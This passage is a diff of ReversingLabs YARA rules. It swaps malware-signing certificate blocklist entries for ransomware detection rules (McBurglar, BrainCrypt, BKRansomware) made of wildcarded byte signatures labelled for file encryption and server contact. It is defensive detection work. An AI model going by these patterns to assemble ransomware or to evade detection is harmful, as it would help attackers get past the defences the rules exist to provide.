?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D + 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 8B 3D ?? + ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 50 FF 15 ?? ?? ?? + ?? 85 C0 8B 85 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 64 89 0D + ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $encrypt_files = { + 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 8B F1 C7 85 + ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4 + ?? 85 C0 74 ?? 83 C8 ?? 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 56 8D 85 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? + 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 0F 57 + C0 68 ?? ?? ?? ?? 50 F3 0F 7F 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? + ?? ?? ?? 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? + 57 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 8B FF + 81 FF ?? ?? ?? ?? 75 ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 + 50 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 6A ?? 50 E8 ?? ?? ?? ?? FF + B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 6A ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 + ?? 8B C7 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 40 BE ?? ?? ?? ?? 2B F0 8D 85 ?? ?? ?? ?? + 56 03 C7 56 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 03 F7 8D 85 ?? ?? + ?? ?? 56 50 50 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 6A ?? 50 E8 ?? + ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? + 83 C4 ?? 33 CD 33 C0 5F 5E E8 ?? ?? ?? ?? 8B E5 5D C3 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MEHANIKUM OOO" and (pe.signatures[i].serial=="00:f3:60:f7:ad:0e:d0:65:fe:c0:b4:4f:98:e0:44:81:a0" or pe.signatures[i].serial=="f3:60:f7:ad:0e:d0:65:fe:c0:b4:4f:98:e0:44:81:a0") and 1599031121<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ($encrypt_files) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_Fe41941464B9992A69B7317418Ae8Eb7 : INFO FILE +rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Mcburglar : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects McBurglar ransomware." author = "ReversingLabs" - id = "dd84a6b2-e616-5f93-af50-1a4fc15f3c45" - date = "2023-11-08" - modified = "2023-11-08" + id = "11816401-87c3-5aff-b161-da0fa4eb4bca" + date = "2021-09-27" + modified = "2021-09-27" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5444-L5462" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "bd5131f2b44deec6a7a68577b80ef4d066c331da2976539ce52ac6cff8d5560e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/ByteCode.MSIL.Ransomware.McBurglar.yara#L1-L75" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "57fefcdc1528fc1c8da36a431cd09774e33ea08a394ac4f8d19a27504e72676d" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "McBurglar" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Milsean Software Limited" and (pe.signatures[i].serial=="00:fe:41:94:14:64:b9:99:2a:69:b7:31:74:18:ae:8e:b7" or pe.signatures[i].serial=="fe:41:94:14:64:b9:99:2a:69:b7:31:74:18:ae:8e:b7") and 1599523200<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_0C14B611A44A1Bae0E8C7581651845B6 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "116beeac-49c6-56b0-a1c0-855623f604d9" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5464-L5480" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7f6028181e33e4ba8264ee367169e7259e19ff49dcae9a337a4ba78c06b459e6" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $setup_env = { + 00 7E ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? + ?? 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 7E ?? ?? ?? + ?? 1B 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? + ?? 00 7E ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 28 ?? ?? + ?? ?? 00 2A + } + $encrypt_files_p1 = { + 00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 2B ?? 73 ?? ?? ?? ?? 0B 07 12 ?? 28 ?? ?? ?? ?? + 7D ?? ?? ?? ?? 00 07 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 + 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 2A + } + $encrypt_files_p2 = { + 00 28 ?? ?? ?? ?? 0A 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 18 73 ?? ?? ?? ?? 0B 73 ?? ?? ?? + ?? 0C 28 ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 0D 73 ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? 6F + ?? ?? ?? ?? 00 11 ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 11 ?? 18 6F ?? ?? ?? ?? 00 09 06 + 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? + ?? 6F ?? ?? ?? ?? 00 11 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? + ?? 00 11 ?? 1A 6F ?? ?? ?? ?? 00 07 06 16 06 8E 69 6F ?? ?? ?? ?? 00 07 11 ?? 6F ?? ?? + ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 02 19 73 ?? ?? ?? ?? 13 ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? + 13 ?? 00 2B ?? 00 11 ?? 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 11 ?? 16 11 ?? 8E 69 + 6F ?? ?? ?? ?? 25 13 ?? 16 FE 02 13 ?? 11 ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 13 + ?? 00 72 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE ?? DE + ?? 00 11 ?? 6F ?? ?? ?? ?? 00 07 6F ?? ?? ?? ?? 00 00 DC 2A + } + $find_files = { + 00 00 02 28 ?? ?? ?? ?? 0A 00 06 0C 16 0D 2B ?? 08 09 9A 13 ?? 00 11 ?? 28 ?? ?? ?? ?? + 00 00 09 17 58 0D 09 08 8E 69 32 ?? 02 28 ?? ?? ?? ?? 0B 00 07 13 ?? 16 13 ?? 2B ?? 11 + ?? 11 ?? 9A 13 ?? 00 11 ?? 28 ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 + ?? 00 DE ?? 26 00 00 DE ?? 2A + } + $generate_salt = { + 00 1F ?? 8D ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 00 16 0C 2B ?? 00 07 06 6F ?? ?? ?? ?? 00 + 00 08 17 58 0C 08 1F ?? FE 04 0D 09 2D ?? 00 DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? 00 DC 06 + 13 ?? 2B ?? 11 ?? 2A + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "NEEDCODE SP Z O O" and pe.signatures[i].serial=="0c:14:b6:11:a4:4a:1b:ae:0e:8c:75:81:65:18:45:b6" and 1600300801<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($setup_env) and ($find_files) and ($generate_salt) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_690910Dc89D7857C3500Fb74Bed2B08D : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Braincrypt : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects BrainCrypt ransomware." author = "ReversingLabs" - id = "7c427b1a-fbe9-5e97-9810-87863c70988d" - date = "2023-11-08" - modified = "2023-11-08" + id = "190798d5-594d-5b80-aa0e-8d7ff167f1c0" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5482-L5498" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3c5da6238279296854eb95ecaed802f453e80c6bceb71c3fa587df0f7d40cf96" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.BrainCrypt.yara#L1-L121" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "85866d6ffa136bf3ed27bbab55ae5430af4a1363930ebacab0df9ad24f8734cb" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "BrainCrypt" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OLIMP STROI, OOO" and pe.signatures[i].serial=="69:09:10:dc:89:d7:85:7c:35:00:fb:74:be:d2:b0:8d" and 1597276800<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_Fd41E6Bd7428D3008C8A05F68C9Ac6F2 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "ef59a76a-3b59-55a2-9da5-c3ba844bbe77" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5500-L5518" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e387664dc9aa746e127b4efb2ef43675f8fb6df66e99d33ef765e8fa306a4f18" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $get_files_for_encryption_32 = { + 64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? 80 7C 24 + ?? ?? 74 ?? 8B 5C 24 ?? 89 1C 24 8B 5C 24 ?? 89 5C 24 ?? BB ?? ?? ?? ?? 89 5C 24 ?? + E8 ?? ?? ?? ?? 83 C4 ?? C3 83 3D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? + 83 C3 ?? FC 8B 0B 89 0C 24 8B 4B ?? 89 4C 24 ?? 83 3D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? + ?? 8B 1D ?? ?? ?? ?? 83 C3 ?? 8D 7C 24 ?? FC 8B 0B 89 0F 8B 4B ?? 89 4F ?? E8 ?? ?? + ?? ?? 8B 5C 24 ?? 89 1D ?? ?? ?? ?? 8B 5C 24 ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 89 1D ?? + ?? ?? ?? 8B 5C 24 ?? 89 1C 24 8B 5C 24 ?? 89 5C 24 ?? BB ?? ?? ?? ?? 89 5C 24 ?? E8 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 0C 24 8B 44 24 ?? C7 04 24 ?? ?? ?? ?? 89 4C 24 ?? 89 + 4C 24 ?? 89 44 24 ?? 89 44 24 ?? BB ?? ?? ?? ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? + E8 ?? ?? ?? ?? 8D 5C 24 ?? FC 8B 0B 89 0C 24 8B 4B ?? 89 4C 24 ?? E8 ?? ?? ?? ?? E9 + ?? ?? ?? ?? BD ?? ?? ?? ?? 89 2C 24 89 5C 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 0F 0B E8 ?? ?? ?? ?? 0F 0B E8 ?? ?? ?? ?? E9 + } + $encrypt_file_32 = { + 64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? 8B 5C 24 + ?? 89 1C 24 8B 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 8B 4C 24 ?? 8B 44 24 + ?? 89 54 24 ?? 89 14 24 89 4C 24 ?? 89 4C 24 ?? 89 44 24 ?? 89 44 24 ?? 8B 5C 24 ?? + 89 5C 24 ?? 8B 5C 24 ?? 89 5C 24 ?? 8B 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 54 24 + ?? 8B 4C 24 ?? 8B 44 24 ?? 8B 5C 24 ?? 89 1C 24 8B 5C 24 ?? 89 5C 24 ?? 89 54 24 ?? + 89 54 24 ?? 89 4C 24 ?? 89 4C 24 ?? 89 44 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? + E8 ?? ?? ?? ?? 83 C4 ?? C3 E8 ?? ?? ?? ?? E9 + } + $attach_to_server_32 = { + 64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? 31 DB 89 + 5C 24 ?? 89 5C 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 89 CF 83 F9 ?? + 0F 84 ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 89 4C 24 ?? 89 0C 24 83 3C 24 ?? 0F 84 ?? ?? + ?? ?? 8B 5C 24 ?? 89 5C 24 ?? 8B 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 89 + 1C 24 83 3C 24 ?? 0F 84 ?? ?? ?? ?? BB ?? ?? ?? ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 89 1C 24 83 3C 24 ?? 0F 84 ?? ?? ?? ?? BB ?? ?? ?? ?? + 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 89 1C 24 83 3C 24 ?? + 0F 84 ?? ?? ?? ?? 8B 5C 24 ?? 89 5C 24 ?? 8B 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B + 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 31 DB 89 5C 24 ?? 89 5C 24 ?? 31 ED 39 E8 0F 85 + ?? ?? ?? ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 4C 24 ?? 89 0C 24 89 44 24 ?? 89 44 24 + ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 48 ?? 8B 68 + ?? 89 6C 24 ?? 89 6C 24 ?? 89 4C 24 ?? 83 F9 ?? 0F 84 ?? ?? ?? ?? 8D 59 ?? C7 04 24 + ?? ?? ?? ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? C7 04 24 ?? ?? ?? + ?? 8B 44 24 ?? 83 F8 ?? 74 ?? 83 C0 ?? 8D 7C 24 ?? FC 8B 08 89 0F 8B 48 ?? 89 4F ?? + E8 ?? ?? ?? ?? 8D 5C 24 ?? FC 8B 0B 89 0C 24 8B 4B ?? 89 4C 24 ?? E8 ?? ?? ?? ?? 8B + 54 24 ?? 8B 4C 24 ?? 8B 44 24 ?? C7 04 24 ?? ?? ?? ?? 89 54 24 ?? 89 54 24 ?? 89 4C + 24 ?? 89 4C 24 ?? 89 44 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 89 5C 24 ?? 8B + 5C 24 ?? 89 5C 24 ?? 90 E8 ?? ?? ?? ?? 83 C4 ?? C3 + } + $get_files_for_encryption_64 = { + 65 48 8B 0C 25 ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 48 3B 61 ?? 0F 86 ?? ?? ?? ?? 48 83 + EC ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? 0F B6 44 24 ?? 84 C0 0F 85 ?? ?? ?? ?? 48 8B 05 + ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 83 F9 ?? 0F 86 ?? ?? ?? ?? 48 8B 48 ?? 48 8B 40 + ?? 48 89 0C 24 48 89 44 24 ?? 48 8B 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 83 F9 ?? + 0F 86 ?? ?? ?? ?? 48 8B 48 ?? 48 8B 40 ?? 48 89 4C 24 ?? 48 89 44 24 ?? E8 ?? ?? ?? + ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 89 0D ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 84 C9 0F 85 + ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 04 24 48 8B 44 24 ?? 48 89 44 + 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 04 24 + 48 8B 4C 24 ?? 48 C7 04 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 4C 24 ?? 48 8D 05 ?? ?? + ?? ?? 48 89 44 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B + 4C 24 ?? 48 89 04 24 48 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 6C 24 ?? 48 83 C4 ?? C3 48 + 8D 0D ?? ?? ?? ?? 48 89 0C 24 48 89 44 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 0F 0B 48 8B 44 24 ?? 48 89 04 24 48 8B 44 24 ?? 48 89 44 24 ?? 48 8D 05 ?? ?? + ?? ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? E9 + } + $attach_to_server_64 = { + 65 48 8B 0C 25 ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 48 3B 61 ?? 0F 86 ?? ?? ?? ?? 48 83 + EC ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? + ?? ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 04 24 E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 48 89 + 7C 24 ?? 84 07 0F 57 C0 48 83 C7 ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? E8 ?? ?? ?? ?? 48 + 8B 6D ?? 48 8B 44 24 ?? 48 89 04 24 48 8B 4C 24 ?? 48 89 4C 24 ?? 48 8B 4C 24 ?? 48 + 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 04 24 48 8D 0D ?? ?? ?? ?? 48 89 4C + 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 04 24 48 8D 0D + ?? ?? ?? ?? 48 89 4C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? + 48 89 04 24 48 8B 4C 24 ?? 48 89 4C 24 ?? 48 8B 4C 24 ?? 48 89 4C 24 ?? E8 ?? ?? ?? + ?? 48 8B 44 24 ?? 48 8B 48 ?? 48 8B 10 48 8B 58 ?? 48 8B 40 ?? 48 39 CB 0F 87 ?? ?? + ?? ?? 48 29 D9 48 29 D8 48 85 C0 0F 84 ?? ?? ?? ?? 48 C7 04 24 ?? ?? ?? ?? 48 01 DA + 48 89 54 24 ?? 48 89 4C 24 ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C + 24 ?? 48 89 0C 24 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B + 48 ?? 48 8B 50 ?? 84 01 48 89 54 24 ?? C7 04 24 ?? ?? ?? ?? 48 83 C1 ?? 48 89 4C 24 + ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? 48 89 04 24 48 8B 44 + 24 ?? 48 8B 48 ?? 48 8B 40 ?? 48 89 4C 24 ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 + 24 ?? 48 8B 4C 24 ?? 48 89 04 24 48 89 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B + 4C 24 ?? 48 8B 54 24 ?? 48 C7 04 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 4C 24 ?? 48 89 + 54 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 89 44 24 ?? 48 89 8C 24 ?? + ?? ?? ?? 90 E8 ?? ?? ?? ?? 48 8B 6C 24 ?? 48 83 C4 ?? C3 90 E8 ?? ?? ?? ?? 48 8B 6C + 24 ?? 48 83 C4 ?? C3 31 DB E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 0B E8 ?? ?? ?? ?? E9 + } + $encrypt_file_64 = { + 65 48 8B 0C 25 ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 48 3B 61 ?? 0F 86 ?? ?? ?? ?? 48 83 + EC ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? 48 8B 44 24 ?? 48 89 04 24 48 8B 44 24 ?? 48 89 + 44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 89 04 24 48 + 89 4C 24 ?? 48 89 54 24 ?? 48 8B 44 24 ?? 48 89 44 24 ?? 48 8B 84 24 ?? ?? ?? ?? 48 + 89 44 24 ?? 48 8B 84 24 ?? ?? ?? ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 + 8B 4C 24 ?? 48 8B 54 24 ?? 48 8B 5C 24 ?? 48 89 1C 24 48 8B 5C 24 ?? 48 89 5C 24 ?? + 48 89 44 24 ?? 48 89 4C 24 ?? 48 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? + 48 8B 6C 24 ?? 48 83 C4 ?? C3 E8 ?? ?? ?? ?? E9 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OM-FAS d.o.o." and (pe.signatures[i].serial=="00:fd:41:e6:bd:74:28:d3:00:8c:8a:05:f6:8c:9a:c6:f2" or pe.signatures[i].serial=="fd:41:e6:bd:74:28:d3:00:8c:8a:05:f6:8c:9a:c6:f2") and 1575590400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and (($get_files_for_encryption_32 and $encrypt_file_32 and $attach_to_server_32) or ($get_files_for_encryption_64 and $encrypt_file_64 and $attach_to_server_64)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_C7079866C0E48B01246Ba0C148E70D4D : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Bkransomware : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects BKRansomware ransomware." author = "ReversingLabs" - id = "2c985bd9-cb2a-553a-af63-a2a0a80cc641" - date = "2023-11-08" - modified = "2023-11-08" + id = "88dc5c4a-046a-52e2-b108-0a90b91d4fb6" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5520-L5538" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "cc144760e0ca21fd98b55ac222db540900def61f54e9644f8cab5f711ec7bf24" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.BKRansomware.yara#L1-L79" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3118098f05a13bd161af0cb1ec322878b371ff70b9f3815a04115a214c0965a2" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "BKRansomware" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO GARANT" and (pe.signatures[i].serial=="00:c7:07:98:66:c0:e4:8b:01:24:6b:a0:c1:48:e7:0d:4d" or 